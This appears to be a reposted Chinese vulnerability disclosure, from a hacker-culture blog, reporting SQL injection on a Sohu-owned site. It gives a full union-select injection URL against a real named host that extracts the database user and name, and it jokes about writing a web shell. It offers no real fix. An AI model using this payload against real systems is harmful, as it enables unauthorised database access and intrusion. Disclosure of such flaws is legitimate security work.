sql注入地址:
http://home.focus.cn/huodong/sjWorks.php?act_id=132 and 1=2 union select user(),database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
这个注入点毫无限制,写个shell如何??算了!!
漏洞证明:
狗哥让传张图
修复方案:
疯了,都疯了
记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华搜狐旗下某站重要二级域名下sql注入之三(涉及12个库)
2014-05-31 16:05
阅读:68954 | 评论:1 | 标签:注入
想收藏或者和大家分享这篇好文章→复制链接地址
“搜狐旗下某站重要二级域名下sql注入之三(涉及12个库)”共有0条留言
发表评论
公告
九层之台,起于累土;黑客之术,始于阅读